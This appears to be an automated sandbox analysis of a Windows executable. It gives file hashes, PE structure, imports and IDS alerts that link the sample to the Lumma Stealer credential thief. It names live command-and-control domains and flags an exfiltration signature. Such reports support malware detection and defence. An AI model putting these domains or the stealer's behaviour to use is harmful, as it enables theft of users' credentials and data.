                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.9.7.8.9.8.0.1.5.7.3.8.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.9.7.8.9.8.0.6.1.0.5.0.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.4.2.7.2.0.9.7.-.7.c.2.7.-.4.e.a.7.-.b.c.4.1.-.d.a.1.1.9.7.2.7.3.7.8.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.6.0.2.7.1.8.b.-.8.a.6.7.-.4.6.8.b.-.8.5.0.6.-.e.3.3.7.6.6.3.b.3.8.9.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e.n.a.m.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.5.8.-.0.0.0.1.-.0.0.1.5.-.d.7.5.4.-.e.d.7.3.4.b.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.f.a.4.d.5.4.f.0.a.5.2.6.5.3.b.e.8.f.3.8.f.c.6.1.0.e.9.9.6.a.2.0.0.0.0.f.f.f.f.!.0.0.0.0.9.a.5.8.4.b.e.1.e.8.9.4.9.c.6.2.7.3.7.7.b.c.c.b.c.b.4.7.b.b.d.9.8.f.3.7.7.d.9.2.!.f.i.l.e.n.a.m.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER42EA.tmp.dmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Fri Jan 10 10:36:20 2025, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):49974
                                                                                                                                                                                                            Entropy (8bit):2.563927749152585
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:2LBcBQCXZ7OruDQ6+qOx1BT2udXFyCl49XgV6IOJ+hWZJ7k6A2+dQWYf:WyDOqDA1TBT2udXFp8ISn79x+nYf
                                                                                                                                                                                                            MD5:88B898372C66D8805A2C9341585F27B3
                                                                                                                                                                                                            SHA1:46D70AC8ABD8CD4FF60FFDB405DDCD8EEA9D1957
                                                                                                                                                                                                            SHA-256:1CC8CB9C9814BDD2764AEB806C0096360AB802BCBD5C9D508F82C6390438CEAF
                                                                                                                                                                                                            SHA-512:6C451F1FAB85885D5AAE55B6E9957A619B375201138249444F3B58C126820F1545B9DE1E53221054526C5EA036C91113F89032C29761FA5A6C4349CD74EF0DBD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:MDMP..a..... .......$..g............4...............H............!......d...|5..........`.......8...........T............E..N}..........."...........$..............................................................................eJ......H%......GenuineIntel............T.......X......g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER43F4.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8356
                                                                                                                                                                                                            Entropy (8bit):3.69682604097452
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l79RJ7t86Im6YwxSU9QQgmfBucFlpDM89bJDsfJDm:R6lXJ7G6Im6YmSU9QQgmfBusJJofg
                                                                                                                                                                                                            MD5:A8651BF3FBE28F75AD64496F9095E72D
                                                                                                                                                                                                            SHA1:05BE662D59EF8FA0C454EE93559FC0C4C2DD3B5C
                                                                                                                                                                                                            SHA-256:58658AE58528FBABE803C6FE671076016F7FDABE8E8AC9F3673A20D8E15785CC
                                                                                                                                                                                                            SHA-512:9A4086A5CB6741DDFB48EF7B55FF0286542D40C1D0D8E73C3A3A6956A3390399738F8040B146FE68FEA59DADE76CE641B08B2ADC0B21C8390BD3CFECF881355D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...3.4.4.8...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.3.4.4.8.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.1.2.<./.P.i.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER4424.tmp.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4616
                                                                                                                                                                                                            Entropy (8bit):4.482359680873746
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwr7SGl8zsyJgkZ7aI9L4WpW8VYHYm8M4JZy+HNOqFaOR+q8GfINOFrOmrxfUU:uIafAh7Vx7VzJZyueORJkSrOmhUgU2d
                                                                                                                                                                                                            MD5:3289C1291727C1037D10819D424A7CE3
                                                                                                                                                                                                            SHA1:BAF76B77E5E7DAA713AD85F7B8192B5D25AFCE8F
                                                                                                                                                                                                            SHA-256:A707B08C8AE7A17F1EADCBAD5C26300DA5C6BB32B287610D0E5323C99A8AE1AB
                                                                                                                                                                                                            SHA-512:DD645C3EC78BAC4BE77F6280B67AF16EE155D384A24F4ED0324AD7E92CB89799971F0A8DF473C009A157073F527F60F15B700DA00D33A3E60050EB8B73DB120E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="3448" />.. <arg nm="verqfe" val="3448" />.. <arg nm="csdbld" val="3448" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="223013488" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

                                                                                                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                                            Entropy (8bit):4.327137582512804
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:URJufhX4RxLT+yMH4A0WBIIQfTa765q/E5ySvL+ML61EhcRo5d5OWiBe8:YJq3BIdBvL+SrcIdYFt
                                                                                                                                                                                                            MD5:B8D22F12ABCD6D26428B4CB51240BC09
                                                                                                                                                                                                            SHA1:14DAC485AEB64CD2D8195CD908E423F04E35B853
                                                                                                                                                                                                            SHA-256:188BB93D34443144E210F3EC7F60B929FB0FB3A185B0AD1F715BFD8D80F02F4A
                                                                                                                                                                                                            SHA-512:F53EA04AB99220BF7E4EBEA7D203B19D3E89AF9D30E58451A2BD44C66AD9A8EDBA72B95DE7F4C8AE9D133A904FABAFD3F816C75C99531A2B2A6AE81D1E5405F1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:regfO...O....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..|Kc..............................................................................................................................................................................................................................................................................................................................................;s.H........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):6.622180953252602
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:filename.exe
                                                                                                                                                                                                            File size:392'192 bytes
                                                                                                                                                                                                            MD5:b826127052f19e148f3a0cbe6f33b59c
                                                                                                                                                                                                            SHA1:9a584be1e8949c627377bccbcb47bbd98f377d92
                                                                                                                                                                                                            SHA256:3741c4663479ad4cbc2159dc4c66ff0fef9290ba58da07c33eb4b87b54cdc81d
                                                                                                                                                                                                            SHA512:154b6542b604c5926c1482b263af7fdb5030e93b04d42feec694f3b4d58b84df804f4d4feadf698a06a22851cf31e7eccd7378315795408f9f4c34a04a01c69d
                                                                                                                                                                                                            SSDEEP:6144:/w/AGkvhnnH8mAvB4gwP1BEPAaNw9+JAnQM4LGPXvd:/NGkJnnHH64v1BEP/w9+JI4ifv
                                                                                                                                                                                                            TLSH:0584BFD1B6B1A428E7B787360D35EBA49B3FB822ED34528ED224365F1D7D2918532703
                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........G.'.&.t.&.t.&.t0i2t.&.t.t t.&.t.t1t.&.t.t't.&.t...t.&.t.&.t.&.t.t.t.&.t.t0t.&.t.t5t.&.tRich.&.t................PE..L...}..e...

                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                            Icon Hash:b2da5868a0424403

                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Entrypoint:0x4019e6
                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                            Time Stamp:0x65908D7D [Sat Dec 30 21:37:01 2023 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                            Import Hash:aea4674a59a95461268ac957ceebb2d3

                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            call 00007FA96C80805Eh
                                                                                                                                                                                                            jmp 00007FA96C80440Dh
                                                                                                                                                                                                            mov edi, edi
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                            sub esp, 00000328h
                                                                                                                                                                                                            mov dword ptr [00447C50h], eax
                                                                                                                                                                                                            mov dword ptr [00447C4Ch], ecx
                                                                                                                                                                                                            mov dword ptr [00447C48h], edx
                                                                                                                                                                                                            mov dword ptr [00447C44h], ebx
                                                                                                                                                                                                            mov dword ptr [00447C40h], esi
                                                                                                                                                                                                            mov dword ptr [00447C3Ch], edi
                                                                                                                                                                                                            mov word ptr [00447C68h], ss
                                                                                                                                                                                                            mov word ptr [00447C5Ch], cs
                                                                                                                                                                                                            mov word ptr [00447C38h], ds
                                                                                                                                                                                                            mov word ptr [00447C34h], es
                                                                                                                                                                                                            mov word ptr [00447C30h], fs
                                                                                                                                                                                                            mov word ptr [00447C2Ch], gs
                                                                                                                                                                                                            pushfd
                                                                                                                                                                                                            pop dword ptr [00447C60h]
                                                                                                                                                                                                            mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                            mov dword ptr [00447C54h], eax
                                                                                                                                                                                                            mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                            mov dword ptr [00447C58h], eax
                                                                                                                                                                                                            lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                            mov dword ptr [00447C64h], eax
                                                                                                                                                                                                            mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                            mov dword ptr [00447BA0h], 00010001h
                                                                                                                                                                                                            mov eax, dword ptr [00447C58h]
                                                                                                                                                                                                            mov dword ptr [00447B54h], eax
                                                                                                                                                                                                            mov dword ptr [00447B48h], C0000409h
                                                                                                                                                                                                            mov dword ptr [00447B4Ch], 00000001h
                                                                                                                                                                                                            mov eax, dword ptr [00445008h]
                                                                                                                                                                                                            mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                            mov eax, dword ptr [0044500Ch]
                                                                                                                                                                                                            mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                            call dword ptr [000000DCh]

                                                                                                                                                                                                            Rich Headers

                                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                                            • [C++] VS2008 build 21022
                                                                                                                                                                                                            • [ASM] VS2008 build 21022
                                                                                                                                                                                                            • [ C ] VS2008 build 21022
                                                                                                                                                                                                            • [IMP] VS2005 build 50727
                                                                                                                                                                                                            • [RES] VS2008 build 21022
                                                                                                                                                                                                            • [LNK] VS2008 build 21022

                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x4389c0x3c.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x4230000x15a38.rsrc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x420000x1a8.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                            Sections

                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                            .text0x10000x4068c0x4080074aa428faaf56442f08207e15c364fa6False0.807151617005814data7.3851056058800415IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .rdata0x420000x22280x2400fd6e74d0a9cda351aa1b3982f74f813cFalse0.3514539930555556data5.3996639236398805IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .data0x450000x3dd1180x7000d3f71c63bad94dd0a0a0fa4046e676a7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .rsrc0x4230000x15a380x15c004ac192ec0679b67a4ba875f41ff9ab37False0.4552015984195402data4.930456729782306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                            Resources

                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                            RT_ICON0x4237600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.5063965884861408
                                                                                                                                                                                                            RT_ICON0x4246080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.5640794223826715
                                                                                                                                                                                                            RT_ICON0x424eb00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.5835253456221198
                                                                                                                                                                                                            RT_ICON0x4255780x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.6163294797687862
                                                                                                                                                                                                            RT_ICON0x425ae00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.39398340248962654
                                                                                                                                                                                                            RT_ICON0x4280880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.4580206378986867
                                                                                                                                                                                                            RT_ICON0x4291300x988Device independent bitmap graphic, 24 x 48 x 32, image size 23040.45901639344262296
                                                                                                                                                                                                            RT_ICON0x429ab80x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.5585106382978723
                                                                                                                                                                                                            RT_ICON0x429f980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3451492537313433
                                                                                                                                                                                                            RT_ICON0x42ae400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.4778880866425993
                                                                                                                                                                                                            RT_ICON0x42b6e80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.5518433179723502
                                                                                                                                                                                                            RT_ICON0x42bdb00x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5939306358381503
                                                                                                                                                                                                            RT_ICON0x42c3180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.32668855534709196
                                                                                                                                                                                                            RT_ICON0x42d3c00x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.32704918032786884
                                                                                                                                                                                                            RT_ICON0x42dd480x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.37677304964539005
                                                                                                                                                                                                            RT_ICON0x42e2180xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.232409381663113
                                                                                                                                                                                                            RT_ICON0x42f0c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.28474729241877256
                                                                                                                                                                                                            RT_ICON0x42f9680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.4078341013824885
                                                                                                                                                                                                            RT_ICON0x4300300x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.32153179190751446
                                                                                                                                                                                                            RT_ICON0x4305980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.5774896265560165
                                                                                                                                                                                                            RT_ICON0x432b400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.6374296435272045
                                                                                                                                                                                                            RT_ICON0x433be80x988Device independent bitmap graphic, 24 x 48 x 32, image size 23040.6741803278688525
                                                                                                                                                                                                            RT_ICON0x4345700x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.7641843971631206
                                                                                                                                                                                                            RT_STRING0x434c080x40adata0.4584139264990329
                                                                                                                                                                                                            RT_STRING0x4350180x9cdata0.6217948717948718
                                                                                                                                                                                                            RT_STRING0x4350b80x79cdata0.4209445585215606
                                                                                                                                                                                                            RT_STRING0x4358580x53adata0.4514200298953662
                                                                                                                                                                                                            RT_STRING0x435d980x772data0.4218258132214061
                                                                                                                                                                                                            RT_STRING0x4365100x7f6data0.41952894995093226
                                                                                                                                                                                                            RT_STRING0x436d080x7a8data0.42244897959183675
                                                                                                                                                                                                            RT_STRING0x4374b00x784data0.420997920997921
                                                                                                                                                                                                            RT_STRING0x437c380x6f2data0.43250843644544434
                                                                                                                                                                                                            RT_STRING0x4383300x708data0.4261111111111111
                                                                                                                                                                                                            RT_GROUP_ICON0x4349d80x76data0.6694915254237288
                                                                                                                                                                                                            RT_GROUP_ICON0x42e1b00x68data0.7115384615384616
                                                                                                                                                                                                            RT_GROUP_ICON0x429f200x76data0.6610169491525424
                                                                                                                                                                                                            RT_VERSION0x434a500x1b4data0.5711009174311926

                                                                                                                                                                                                            Imports

                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                            KERNEL32.dllGetCommandLineW, PulseEvent, SetDefaultCommConfigA, WriteConsoleOutputW, SetUnhandledExceptionFilter, EndUpdateResourceW, InterlockedDecrement, GetEnvironmentStringsW, GetComputerNameW, GetModuleHandleW, GetDateFormatA, LoadLibraryW, GetConsoleMode, ReadProcessMemory, GetVersionExW, DeleteVolumeMountPointW, GetTimeFormatW, GetConsoleAliasW, CreateProcessA, GetAtomNameW, GetStartupInfoW, DisconnectNamedPipe, SetLastError, GetProcAddress, SearchPathA, SetFileAttributesA, GetNumaHighestNodeNumber, OpenWaitableTimerA, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, AddAtomA, FoldStringW, SetLocaleInfoW, RequestWakeupLatency, BuildCommDCBA, WriteConsoleOutputAttribute, GetShortPathNameW, FindFirstVolumeA, FindAtomW, UnregisterWaitEx, OpenFileMappingA, CreateFileA, WriteConsoleW, MultiByteToWideChar, GetLastError, HeapReAlloc, HeapAlloc, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapCreate, VirtualFree, HeapFree, VirtualAlloc, WriteFile, GetStdHandle, GetModuleFileNameA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, RtlUnwind, HeapSize, ReadFile, GetConsoleCP, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP, GetModuleHandleA
                                                                                                                                                                                                            USER32.dllGetClassLongW

                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                            2025-01-10T11:36:09.495762+01002058608ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enterwahsh .biz)1192.168.2.3561841.1.1.153UDP
                                                                                                                                                                                                            2025-01-10T11:36:09.581828+01002058514ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)1192.168.2.3500721.1.1.153UDP
                                                                                                                                                                                                            2025-01-10T11:36:09.594358+01002058502ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)1192.168.2.3563861.1.1.153UDP
                                                                                                                                                                                                            2025-01-10T11:36:09.605984+01002058492ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)1192.168.2.3607211.1.1.153UDP
                                                                                                                                                                                                            2025-01-10T11:36:09.620029+01002058500ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)1192.168.2.3509601.1.1.153UDP
                                                                                                                                                                                                            2025-01-10T11:36:09.630241+01002058510ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)1192.168.2.3637881.1.1.153UDP
                                                                                                                                                                                                            2025-01-10T11:36:09.644088+01002058484ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)1192.168.2.3629751.1.1.153UDP
                                                                                                                                                                                                            2025-01-10T11:36:09.658299+01002058512ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)1192.168.2.3578591.1.1.153UDP
                                                                                                                                                                                                            2025-01-10T11:36:09.669950+01002058480ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)1192.168.2.3508351.1.1.153UDP
                                                                                                                                                                                                            2025-01-10T11:36:10.352691+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.349745104.102.49.254443TCP
                                                                                                                                                                                                            2025-01-10T11:36:10.823273+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.349745104.102.49.254443TCP
                                                                                                                                                                                                            2025-01-10T11:36:11.568040+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.349754104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:36:12.005133+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.349754104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:36:12.005133+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.349754104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:36:12.519064+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.349762104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:36:12.976226+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.349762104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:36:12.976226+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.349762104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:36:14.301208+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.349773104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:36:14.719353+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.349773104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:36:15.320339+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.349779104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:36:16.483701+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.349788104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:36:17.826170+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.349799104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:36:18.838630+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.349805104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:36:19.840374+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.349811104.21.48.1443TCP
